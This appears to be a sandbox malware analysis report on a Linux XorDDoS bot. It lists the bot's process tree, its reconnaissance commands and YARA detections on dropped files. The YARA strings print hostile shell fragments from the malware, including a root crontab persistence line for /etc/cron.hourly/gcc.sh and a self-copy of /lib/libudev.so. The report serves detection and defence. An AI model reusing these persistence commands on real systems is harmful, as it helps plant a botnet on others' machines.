zpxsvbblcg (PID: 6555, Parent: 6554, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg "ls -la" 6231

zpxsvbblcg New Fork (PID: 6557, Parent: 6555)

libudev.so New Fork (PID: 6556, Parent: 6231)

libudev.so New Fork (PID: 6558, Parent: 6556)

zpxsvbblcg (PID: 6558, Parent: 1860, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg who 6231

zpxsvbblcg New Fork (PID: 6561, Parent: 6558)

libudev.so New Fork (PID: 6559, Parent: 6231)

libudev.so New Fork (PID: 6560, Parent: 6559)

zpxsvbblcg (PID: 6560, Parent: 1860, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg bash 6231

zpxsvbblcg New Fork (PID: 6562, Parent: 6560)

libudev.so New Fork (PID: 6567, Parent: 6231)

libudev.so New Fork (PID: 6568, Parent: 6567)

ockerbcjas (PID: 6568, Parent: 6567, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "ps -ef" 6231

ockerbcjas New Fork (PID: 6571, Parent: 6568)

libudev.so New Fork (PID: 6569, Parent: 6231)

libudev.so New Fork (PID: 6570, Parent: 6569)

ockerbcjas (PID: 6570, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "route -n" 6231

ockerbcjas New Fork (PID: 6576, Parent: 6570)

libudev.so New Fork (PID: 6572, Parent: 6231)

libudev.so New Fork (PID: 6573, Parent: 6572)

ockerbcjas (PID: 6573, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "ls -la" 6231

ockerbcjas New Fork (PID: 6578, Parent: 6573)

libudev.so New Fork (PID: 6574, Parent: 6231)

libudev.so New Fork (PID: 6575, Parent: 6574)

ockerbcjas (PID: 6575, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas id 6231

ockerbcjas New Fork (PID: 6581, Parent: 6575)

libudev.so New Fork (PID: 6577, Parent: 6231)

libudev.so New Fork (PID: 6579, Parent: 6577)

ockerbcjas (PID: 6579, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "ls -la" 6231

ockerbcjas New Fork (PID: 6580, Parent: 6579)

libudev.so New Fork (PID: 6584, Parent: 6231)

libudev.so New Fork (PID: 6585, Parent: 6584)

xtzjojyyzf (PID: 6585, Parent: 6584, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf sh 6231

xtzjojyyzf New Fork (PID: 6588, Parent: 6585)

libudev.so New Fork (PID: 6586, Parent: 6231)

libudev.so New Fork (PID: 6587, Parent: 6586)

xtzjojyyzf (PID: 6587, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf "grep \"A\"" 6231

xtzjojyyzf New Fork (PID: 6593, Parent: 6587)

libudev.so New Fork (PID: 6589, Parent: 6231)

libudev.so New Fork (PID: 6590, Parent: 6589)

xtzjojyyzf (PID: 6590, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf ifconfig 6231

xtzjojyyzf New Fork (PID: 6596, Parent: 6590)

libudev.so New Fork (PID: 6591, Parent: 6231)

libudev.so New Fork (PID: 6592, Parent: 6591)

xtzjojyyzf (PID: 6592, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf "sleep 1" 6231

xtzjojyyzf New Fork (PID: 6597, Parent: 6592)

libudev.so New Fork (PID: 6594, Parent: 6231)

libudev.so New Fork (PID: 6595, Parent: 6594)

xtzjojyyzf (PID: 6595, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf "ifconfig eth0" 6231

xtzjojyyzf New Fork (PID: 6598, Parent: 6595)

libudev.so New Fork (PID: 6601, Parent: 6231)

libudev.so New Fork (PID: 6602, Parent: 6601)

blrhrkypbo (PID: 6602, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo whoami 6231

blrhrkypbo New Fork (PID: 6607, Parent: 6602)

libudev.so New Fork (PID: 6603, Parent: 6231)

libudev.so New Fork (PID: 6604, Parent: 6603)

blrhrkypbo (PID: 6604, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo "netstat -an" 6231

blrhrkypbo New Fork (PID: 6610, Parent: 6604)

libudev.so New Fork (PID: 6605, Parent: 6231)

libudev.so New Fork (PID: 6606, Parent: 6605)

blrhrkypbo (PID: 6606, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo uptime 6231

blrhrkypbo New Fork (PID: 6612, Parent: 6606)

libudev.so New Fork (PID: 6608, Parent: 6231)

libudev.so New Fork (PID: 6609, Parent: 6608)

blrhrkypbo (PID: 6609, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo id 6231

blrhrkypbo New Fork (PID: 6614, Parent: 6609)

libudev.so New Fork (PID: 6611, Parent: 6231)

libudev.so New Fork (PID: 6613, Parent: 6611)

blrhrkypbo (PID: 6613, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo top 6231

blrhrkypbo New Fork (PID: 6615, Parent: 6613)

systemd New Fork (PID: 6243, Parent: 6242)

snapd-env-generator (PID: 6243, Parent: 6242, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
libudev.so	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/hfdnmorvjd	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/hfdnmorvjd	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ctwojuywol	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ctwojuywol	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ctwojuywol	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/cjrbrkowir	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/cjrbrkowir	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/cjrbrkowir	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/bnuowhwlvc	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/bnuowhwlvc	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/bnuowhwlvc	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/trcmbxxcta	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/trcmbxxcta	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/trcmbxxcta	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/fsqerkomug	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/fsqerkomug	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/fsqerkomug	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/chrcfbeejh	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/chrcfbeejh	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/chrcfbeejh	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/jjfbelholv	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/jjfbelholv	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/jjfbelholv	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/mljnlxkfff	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/mljnlxkfff	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mljnlxkfff	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/tiupbsaswr	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/tiupbsaswr	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/tiupbsaswr	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/etc/init.d/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/etc/init.d/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/etc/init.d/libudev.so	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/uhyqxsqece	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/uhyqxsqece	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/uhyqxsqece	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/uijxdyxaco	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/uijxdyxaco	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
